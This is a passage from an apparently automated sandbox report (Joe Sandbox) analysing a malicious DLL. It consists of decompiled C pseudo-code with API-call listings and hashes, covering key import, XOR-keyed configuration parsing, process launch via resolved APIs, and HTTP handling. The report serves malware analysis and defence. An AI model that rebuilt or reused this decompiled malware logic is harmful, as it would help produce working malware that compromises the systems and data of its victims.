                    
                    				_t11 =  &_a4;
                    				_t21 = 0;
                    				__imp__( &_a8);
                    				_t13 = E04444872( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                    				if(_t13 == 0) {
                    					_t21 = E044463FD(_a8 + _a8);
                    					if(_t21 != 0) {
                    						E0444213D(_a4, _t21, _t23);
                    					}
                    					E044417AB(_a4);
                    				}
                    				return _t21;
                    			}






                    APIs
                    • lstrlen.KERNEL32(?,?,?,00000000,?,0444191E,00000000,?,?,?,04446ABB,?,04F495B0), ref: 04447896
                      • Part of subcall function 04444872: CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,04443AC6), ref: 044448AA
                      • Part of subcall function 04444872: memcpy.NTDLL(?,04443AC6,00000010,?,?,?,?,?,?,?,?,?,?,044460F5,00000000,04444DD9), ref: 044448C3
                      • Part of subcall function 04444872: CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 044448EC
                      • Part of subcall function 04444872: CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 04444904
                      • Part of subcall function 04444872: memcpy.NTDLL(00000000,04444DD9,04443AC6,0000011F), ref: 04444956
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                    • String ID:
                    • API String ID: 894908221-0
                    • Opcode ID: 8b29880f25cc4f09133b1ce6d0f7e75904fe61459a7434ef46c28b9c5f8a2159
                    • Instruction ID: 7677b31d7fe85c18e5fd3ca72d162438c297853f9615d1720f281be6310b9280
                    • Opcode Fuzzy Hash: 8b29880f25cc4f09133b1ce6d0f7e75904fe61459a7434ef46c28b9c5f8a2159
                    • Instruction Fuzzy Hash: 35F03A76100508BAEF016E56DC04DEB3FADEFC53A4B018027FD18DA111DB31EA569BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04444DC8(void* __edi, void* _a4) {
                    				int _t7;
                    				int _t12;
                    
                    				_t7 = E0444607D(__edi, _a4,  &_a4); // executed
                    				_t12 = _t7;
                    				if(_t12 != 0) {
                    					memcpy(__edi, _a4, _t12);
                    					 *((char*)(__edi + _t12)) = 0;
                    					E044417AB(_a4);
                    				}
                    				return _t12;
                    			}






                    APIs
                      • Part of subcall function 0444607D: memcpy.NTDLL(00000000,00000110,?,?,?,?,04444DD9,?,04443AC6,04443AC6,?), ref: 044460B3
                      • Part of subcall function 0444607D: memset.NTDLL ref: 04446128
                      • Part of subcall function 0444607D: memset.NTDLL ref: 0444613C
                    • memcpy.NTDLL(?,04443AC6,00000000,?,04443AC6,04443AC6,?,?,04443AC6,?), ref: 04444DE4
                      • Part of subcall function 044417AB: HeapFree.KERNEL32(00000000,00000000,04442976,00000000,?,?,00000000), ref: 044417B7
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: memcpymemset$FreeHeap
                    • String ID:
                    • API String ID: 3053036209-0
                    • Opcode ID: cbe814ac95b5c3fbea9387f03cde9c72dc3506a6f1379caf50c8319b0ad1936c
                    • Instruction ID: f0f60cf20c8e79baa7ff32eb5691bb2e530f44c2ef1457b41d99928a0cda149b
                    • Opcode Fuzzy Hash: cbe814ac95b5c3fbea9387f03cde9c72dc3506a6f1379caf50c8319b0ad1936c
                    • Instruction Fuzzy Hash: CEE08C7650052977EF122A95DC00EEFBF6CDF926D1F00402BFE088A201E632E65097F2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E04444EF3(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                    				int _v8;
                    				void* _v12;
                    				void* _v16;
                    				signed int _t28;
                    				signed int _t33;
                    				signed int _t39;
                    				char* _t45;
                    				char* _t46;
                    				char* _t47;
                    				char* _t48;
                    				char* _t49;
                    				char* _t50;
                    				void* _t51;
                    				void* _t52;
                    				void* _t53;
                    				intOrPtr _t54;
                    				void* _t56;
                    				intOrPtr _t57;
                    				intOrPtr _t58;
                    				signed int _t61;
                    				intOrPtr _t64;
                    				signed int _t65;
                    				signed int _t70;
                    				void* _t72;
                    				void* _t73;
                    				signed int _t75;
                    				signed int _t78;
                    				signed int _t82;
                    				signed int _t86;
                    				signed int _t90;
                    				signed int _t94;
                    				signed int _t98;
                    				void* _t101;
                    				void* _t102;
                    				void* _t115;
                    				void* _t118;
                    				intOrPtr _t121;
                    
                    				_t118 = __esi;
                    				_t115 = __edi;
                    				_t104 = __ecx;
                    				_t101 = __ebx;
                    				_t28 =  *0x444a31c; // 0x69b25f44
                    				if(E04444451( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                    					 *0x444a374 = _v8;
                    				}
                    				_t33 =  *0x444a31c; // 0x69b25f44
                    				if(E04444451( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                    					_v12 = 2;
                    					L69:
                    					return _v12;
                    				}
                    				_t39 =  *0x444a31c; // 0x69b25f44
                    				_push(_t115);
                    				if(E04444451( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                    					L67:
                    					HeapFree( *0x444a2d8, 0, _v16);
                    					goto L69;
                    				} else {
                    					_push(_t101);
                    					_t102 = _v12;
                    					if(_t102 == 0) {
                    						_t45 = 0;
                    					} else {
                    						_t98 =  *0x444a31c; // 0x69b25f44
                    						_t45 = E0444572F(_t104, _t102, _t98 ^ 0x7895433b);
                    					}
                    					_push(_t118);
                    					if(_t45 != 0) {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                    							 *0x444a2e0 = _v8;
                    						}
                    					}
                    					if(_t102 == 0) {
                    						_t46 = 0;
                    					} else {
                    						_t94 =  *0x444a31c; // 0x69b25f44
                    						_t46 = E0444572F(_t104, _t102, _t94 ^ 0x219b08c7);
                    					}
                    					if(_t46 != 0) {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                    							 *0x444a2e4 = _v8;
                    						}
                    					}
                    					if(_t102 == 0) {
                    						_t47 = 0;
                    					} else {
                    						_t90 =  *0x444a31c; // 0x69b25f44
                    						_t47 = E0444572F(_t104, _t102, _t90 ^ 0x31fc0661);
                    					}
                    					if(_t47 != 0) {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                    							 *0x444a2e8 = _v8;
                    						}
                    					}
                    					if(_t102 == 0) {
                    						_t48 = 0;
                    					} else {
                    						_t86 =  *0x444a31c; // 0x69b25f44
                    						_t48 = E0444572F(_t104, _t102, _t86 ^ 0x0cd926ce);
                    					}
                    					if(_t48 != 0) {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                    							 *0x444a004 = _v8;
                    						}
                    					}
                    					if(_t102 == 0) {
                    						_t49 = 0;
                    					} else {
                    						_t82 =  *0x444a31c; // 0x69b25f44
                    						_t49 = E0444572F(_t104, _t102, _t82 ^ 0x3cd8b2cb);
                    					}
                    					if(_t49 != 0) {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                    							 *0x444a02c = _v8;
                    						}
                    					}
                    					if(_t102 == 0) {
                    						_t50 = 0;
                    					} else {
                    						_t78 =  *0x444a31c; // 0x69b25f44
                    						_t50 = E0444572F(_t104, _t102, _t78 ^ 0x2878b929);
                    					}
                    					if(_t50 == 0) {
                    						L41:
                    						 *0x444a2ec = 5;
                    						goto L42;
                    					} else {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                    							goto L41;
                    						} else {
                    							L42:
                    							if(_t102 == 0) {
                    								_t51 = 0;
                    							} else {
                    								_t75 =  *0x444a31c; // 0x69b25f44
                    								_t51 = E0444572F(_t104, _t102, _t75 ^ 0x261a367a);
                    							}
                    							if(_t51 != 0) {
                    								_push(_t51);
                    								_t72 = 0x10;
                    								_t73 = E04441760(_t72);
                    								if(_t73 != 0) {
                    									_push(_t73);
                    									E04444DFF();
                    								}
                    							}
                    							if(_t102 == 0) {
                    								_t52 = 0;
                    							} else {
                    								_t70 =  *0x444a31c; // 0x69b25f44
                    								_t52 = E0444572F(_t104, _t102, _t70 ^ 0xb9d404b2);
                    							}
                    							if(_t52 != 0 && E04441760(0, _t52) != 0) {
                    								_t121 =  *0x444a3cc; // 0x4f495b0
                    								E04441000(_t121 + 4, _t68);
                    							}
                    							if(_t102 == 0) {
                    								_t53 = 0;
                    							} else {
                    								_t65 =  *0x444a31c; // 0x69b25f44
                    								_t53 = E0444572F(_t104, _t102, _t65 ^ 0x3df17130);
                    							}
                    							if(_t53 == 0) {
                    								L59:
                    								_t54 =  *0x444a320; // 0xafd5a8
                    								_t22 = _t54 + 0x444b252; // 0x616d692f
                    								 *0x444a370 = _t22;
                    								goto L60;
                    							} else {
                    								_t64 = E04441760(0, _t53);
                    								 *0x444a370 = _t64;
                    								if(_t64 != 0) {
                    									L60:
                    									if(_t102 == 0) {
                    										_t56 = 0;
                    									} else {
                    										_t61 =  *0x444a31c; // 0x69b25f44
                    										_t56 = E0444572F(_t104, _t102, _t61 ^ 0xd2079859);
                    									}
                    									if(_t56 == 0) {
                    										_t57 =  *0x444a320; // 0xafd5a8
                    										_t23 = _t57 + 0x444b791; // 0x6976612e
                    										_t58 = _t23;
                    									} else {
                    										_t58 = E04441760(0, _t56);
                    									}
                    									 *0x444a3e0 = _t58;
                    									HeapFree( *0x444a2d8, 0, _t102);
                    									_v12 = 0;
                    									goto L67;
                    								}
                    								goto L59;
                    							}
                    						}
                    					}
                    				}
                    			}









































                    APIs
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0444A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04444F98
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0444A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04444FCA
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0444A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04444FFC
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0444A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 0444502E
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0444A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04445060
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0444A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04445092
                    • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 04445191
                    • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 044451A5
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID: Ut
                    • API String ID: 3298025750-8415677
                    • Opcode ID: 926d2f93c430c8aec1434e53737f2c35f2bcb9189978206d26991321371297a2
                    • Instruction ID: c0d70d79e3c24c119255a15cf0bfd582791c13329a6d3bb114e8adcc5164b72c
                    • Opcode Fuzzy Hash: 926d2f93c430c8aec1434e53737f2c35f2bcb9189978206d26991321371297a2
                    • Instruction Fuzzy Hash: 81816379B40204BBFF20DBB59C88D5BB7E9EBC87457244927A201E7205FA39F9419760
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E0444196A(void* __eax, void* __ecx) {
                    				long _v8;
                    				char _v12;
                    				void* _v16;
                    				void* _v28;
                    				long _v32;
                    				void _v104;
                    				char _v108;
                    				long _t36;
                    				intOrPtr _t40;
                    				intOrPtr _t47;
                    				intOrPtr _t50;
                    				void* _t58;
                    				void* _t68;
                    				intOrPtr* _t70;
                    				intOrPtr* _t71;
                    
                    				_t1 = __eax + 0x14; // 0x74183966
                    				_t69 =  *_t1;
                    				_t36 = E0444624F(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                    				_v8 = _t36;
                    				if(_t36 != 0) {
                    					L12:
                    					return _v8;
                    				}
                    				E04447961( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                    				_t40 = _v12(_v12);
                    				_v8 = _t40;
                    				if(_t40 == 0 && ( *0x444a300 & 0x00000001) != 0) {
                    					_v32 = 0;
                    					asm("stosd");
                    					asm("stosd");
                    					asm("stosd");
                    					_v108 = 0;
                    					memset( &_v104, 0, 0x40);
                    					_t47 =  *0x444a320; // 0xafd5a8
                    					_t18 = _t47 + 0x444b3e6; // 0x73797325
                    					_t68 = E04441E10(_t18);
                    					if(_t68 == 0) {
                    						_v8 = 8;
                    					} else {
                    						_t50 =  *0x444a320; // 0xafd5a8
                    						_t19 = _t50 + 0x444b747; // 0x4f48cef
                    						_t20 = _t50 + 0x444b0af; // 0x4e52454b
                    						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                    						if(_t71 == 0) {
                    							_v8 = 0x7f;
                    						} else {
                    							_v108 = 0x44;
                    							E04446381();
                    							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                    							_push(1);
                    							E04446381();
                    							if(_t58 == 0) {
                    								_v8 = GetLastError();
                    							} else {
                    								CloseHandle(_v28);
                    								CloseHandle(_v32);
                    							}
                    						}
                    						HeapFree( *0x444a2d8, 0, _t68);
                    					}
                    				}
                    				_t70 = _v16;
                    				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                    				E044417AB(_t70);
                    				goto L12;
                    			}

                    APIs
                      • Part of subcall function 0444624F: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04441986,?,?,?,?,00000000,00000000), ref: 04446274
                      • Part of subcall function 0444624F: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04446296
                      • Part of subcall function 0444624F: GetProcAddress.KERNEL32(00000000,614D775A), ref: 044462AC
                      • Part of subcall function 0444624F: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 044462C2
                      • Part of subcall function 0444624F: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 044462D8
                      • Part of subcall function 0444624F: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 044462EE
                    • memset.NTDLL ref: 044419D4
                      • Part of subcall function 04441E10: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,044419ED,73797325), ref: 04441E21
                      • Part of subcall function 04441E10: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04441E3B
                    • GetModuleHandleA.KERNEL32(4E52454B,04F48CEF,73797325), ref: 04441A0A
                    • GetProcAddress.KERNEL32(00000000), ref: 04441A11
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04441A79
                      • Part of subcall function 04446381: GetProcAddress.KERNEL32(36776F57,0444793C), ref: 0444639C
                    • CloseHandle.KERNEL32(00000000,00000001), ref: 04441A56
                    • CloseHandle.KERNEL32(?), ref: 04441A5B
                    • GetLastError.KERNEL32(00000001), ref: 04441A5F
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                    • String ID: Ut
                    • API String ID: 3075724336-8415677
                    • Opcode ID: 68b656cdbb5ffc13cf098c3656afb8c365bb64975f88744ce27674362e735930
                    • Instruction ID: 58d3c97a53958af2995f06b4966df73ae54b3fd60822865de3ec2b1716584774
                    • Opcode Fuzzy Hash: 68b656cdbb5ffc13cf098c3656afb8c365bb64975f88744ce27674362e735930
                    • Instruction Fuzzy Hash: AB314FB6900218AFFF10AFA5DC88D9FBBBCEB88344F00456AE505B7151DB34AE859B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 43%
                    			E0444266A(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				char _v20;
                    				intOrPtr _v24;
                    				signed int _v28;
                    				intOrPtr _v32;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr _t58;
                    				signed int _t60;
                    				signed int _t62;
                    				intOrPtr _t64;
                    				intOrPtr _t66;
                    				intOrPtr _t70;
                    				void* _t72;
                    				void* _t75;
                    				void* _t76;
                    				intOrPtr _t80;
                    				WCHAR* _t83;
                    				void* _t84;
                    				void* _t85;
                    				void* _t86;
                    				intOrPtr _t92;
                    				intOrPtr* _t102;
                    				signed int _t103;
                    				void* _t104;
                    				intOrPtr _t105;
                    				void* _t107;
                    				intOrPtr* _t115;
                    				void* _t119;
                    				intOrPtr _t125;
                    
                    				_t58 =  *0x444a3dc; // 0x4f49c00
                    				_v24 = _t58;
                    				_v28 = 8;
                    				_v20 = GetTickCount();
                    				_t60 = E04442E72();
                    				_t103 = 5;
                    				_t98 = _t60 % _t103 + 6;
                    				_t62 = E04442E72();
                    				_t117 = _t62 % _t103 + 6;
                    				_v32 = _t62 % _t103 + 6;
                    				_t64 = E04442F7B(_t60 % _t103 + 6);
                    				_v16 = _t64;
                    				if(_t64 != 0) {
                    					_t66 = E04442F7B(_t117);
                    					_v12 = _t66;
                    					if(_t66 != 0) {
                    						_push(5);
                    						_t104 = 0xa;
                    						_t119 = E04441289(_t104,  &_v20);
                    						if(_t119 == 0) {
                    							_t119 = 0x444918c;
                    						}
                    						_t70 = E04441DDD(_v24);
                    						_v8 = _t70;
                    						if(_t70 != 0) {
                    							_t115 = __imp__;
                    							_t72 =  *_t115(_t119);
                    							_t75 =  *_t115(_v8);
                    							_t76 =  *_t115(_a4);
                    							_t80 = E044463FD(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
                    							_v24 = _t80;
                    							if(_t80 != 0) {
                    								_t105 =  *0x444a320; // 0xafd5a8
                    								_t102 =  *0x444a134; // 0x4447ca9
                    								_t28 = _t105 + 0x444bb08; // 0x530025
                    								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
                    								_push(4);
                    								_t107 = 5;
                    								_t83 = E04441289(_t107,  &_v20);
                    								_a8 = _t83;
                    								if(_t83 == 0) {
                    									_a8 = 0x4449190;
                    								}
                    								_t84 =  *_t115(_a8);
                    								_t85 =  *_t115(_v8);
                    								_t86 =  *_t115(_a4);
                    								_t125 = E044463FD(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
                    								if(_t125 == 0) {
                    									E044417AB(_v24);
                    								} else {
                    									_t92 =  *0x444a320; // 0xafd5a8
                    									_t44 = _t92 + 0x444bc80; // 0x73006d
                    									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
                    									 *_a16 = _v24;
                    									_v28 = _v28 & 0x00000000;
                    									 *_a20 = _t125;
                    								}
                    							}
                    							E044417AB(_v8);
                    						}
                    						E044417AB(_v12);
                    					}
                    					E044417AB(_v16);
                    				}
                    				return _v28;
                    			}

                    APIs
                    • GetTickCount.KERNEL32 ref: 04442682
                    • lstrlen.KERNEL32(00000000,00000005), ref: 04442703
                    • lstrlen.KERNEL32(?), ref: 04442714
                    • lstrlen.KERNEL32(00000000), ref: 0444271B
                    • lstrlenW.KERNEL32(80000002), ref: 04442722
                    • lstrlen.KERNEL32(?,00000004), ref: 0444278B
                    • lstrlen.KERNEL32(?), ref: 04442794
                    • lstrlen.KERNEL32(?), ref: 0444279B
                    • lstrlenW.KERNEL32(?), ref: 044427A2
                      • Part of subcall function 044417AB: HeapFree.KERNEL32(00000000,00000000,04442976,00000000,?,?,00000000), ref: 044417B7
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: lstrlen$CountFreeHeapTick
                    • String ID:
                    • API String ID: 2535036572-0
                    • Opcode ID: 8d2d786b4be42e48342835763fa93591d396449b5ad5d5140433a5fb5047c55a
                    • Instruction ID: de28b8b852461a5c9e591bb7792d848fee9aee5405326059a066ea55f8800644
                    • Opcode Fuzzy Hash: 8d2d786b4be42e48342835763fa93591d396449b5ad5d5140433a5fb5047c55a
                    • Instruction Fuzzy Hash: 2F51C076D00219AFEF11AFA5CC44A9E7BB1FF84354F05406AF904A7211DB35AE11DBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E044458EE(void* __ecx, void* __esi) {
                    				long _v8;
                    				long _v12;
                    				long _v16;
                    				long _v20;
                    				long _t34;
                    				long _t39;
                    				long _t42;
                    				long _t56;
                    				void* _t58;
                    				void* _t59;
                    				void* _t61;
                    
                    				_t61 = __esi;
                    				_t59 = __ecx;
                    				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                    				do {
                    					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                    					_v20 = _t34;
                    					if(_t34 != 0) {
                    						L3:
                    						_v8 = 4;
                    						_v16 = 0;
                    						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                    							_t39 = GetLastError();
                    							_v12 = _t39;
                    							if(_v20 == 0 || _t39 != 0x2ef3) {
                    								L15:
                    								return _v12;
                    							} else {
                    								goto L11;
                    							}
                    						}
                    						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                    							goto L11;
                    						} else {
                    							_v16 = 0;
                    							_v8 = 0;
                    							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
                    							_t58 = E044463FD(_v8 + 1);
                    							if(_t58 == 0) {
                    								_v12 = 8;
                    							} else {
                    								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                    									E044417AB(_t58);
                    									_v12 = GetLastError();
                    								} else {
                    									 *((char*)(_t58 + _v8)) = 0;
                    									 *(_t61 + 0xc) = _t58;
                    								}
                    							}
                    							goto L15;
                    						}
                    					}
                    					SetEvent( *(_t61 + 0x1c));
                    					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                    					_v12 = _t56;
                    					if(_t56 != 0) {
                    						goto L15;
                    					}
                    					goto L3;
                    					L11:
                    					_t42 = E04445867( *(_t61 + 0x1c), _t59, 0xea60);
                    					_v12 = _t42;
                    				} while (_t42 == 0);
                    				goto L15;
                    			}

                    APIs
                    • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 04445905
                    • SetEvent.KERNEL32(?), ref: 04445915
                    • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04445947
                    • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0444596C
                    • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0444598C
                    • GetLastError.KERNEL32 ref: 0444599E
                      • Part of subcall function 04445867: WaitForMultipleObjects.KERNEL32(00000002,04447AF8,00000000,04447AF8,?,?,?,04447AF8,0000EA60), ref: 04445882
                      • Part of subcall function 044417AB: HeapFree.KERNEL32(00000000,00000000,04442976,00000000,?,?,00000000), ref: 044417B7
                    • GetLastError.KERNEL32(00000000), ref: 044459D3
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                    • String ID:
                    • API String ID: 3369646462-0
                    • Opcode ID: 4425c94a8e590ada960727623c2ad06a3a0119585a94095d38522f0c5a98eb50
                    • Instruction ID: 6341f68dc02119107bc876f667012025f16fd68136df821ad225b7e5d49ef258
                    • Opcode Fuzzy Hash: 4425c94a8e590ada960727623c2ad06a3a0119585a94095d38522f0c5a98eb50
                    • Instruction Fuzzy Hash: 4531EAB5900309FFFF21DFE5C884A9FB7B8EB48354F10496AE641A2241D735AA459B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SysAllocString.OLEAUT32(00000000), ref: 04444D03
                    • SysAllocString.OLEAUT32(0070006F), ref: 04444D17
                    • SysAllocString.OLEAUT32(00000000), ref: 04444D29
                    • SysFreeString.OLEAUT32(00000000), ref: 04444D8D
                    • SysFreeString.OLEAUT32(00000000), ref: 04444D9C
                    • SysFreeString.OLEAUT32(00000000), ref: 04444DA7
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: String$AllocFree
                    • String ID:
                    • API String ID: 344208780-0
                    • Opcode ID: 6bf4cabb0e2b07060199af3f51031512520b97b9195fa98e6d4dc733b7e8efb1
                    • Instruction ID: 3c72510a349b8edeabe9792f6ca55d8523716028ac74b77fd8035e0d40d243fd
                    • Opcode Fuzzy Hash: 6bf4cabb0e2b07060199af3f51031512520b97b9195fa98e6d4dc733b7e8efb1
                    • Instruction Fuzzy Hash: EE315E72D00609AFEF01DFB8C844A9FB7B6EF89310F144425E910EB210DB75AD05CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0444624F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                    				intOrPtr _v8;
                    				intOrPtr _t23;
                    				intOrPtr _t26;
                    				_Unknown_base(*)()* _t28;
                    				intOrPtr _t30;
                    				_Unknown_base(*)()* _t32;
                    				intOrPtr _t33;
                    				_Unknown_base(*)()* _t35;
                    				intOrPtr _t36;
                    				_Unknown_base(*)()* _t38;
                    				intOrPtr _t39;
                    				_Unknown_base(*)()* _t41;
                    				intOrPtr _t44;
                    				struct HINSTANCE__* _t48;
                    				intOrPtr _t54;
                    
                    				_t54 = E044463FD(0x20);
                    				if(_t54 == 0) {
                    					_v8 = 8;
                    				} else {
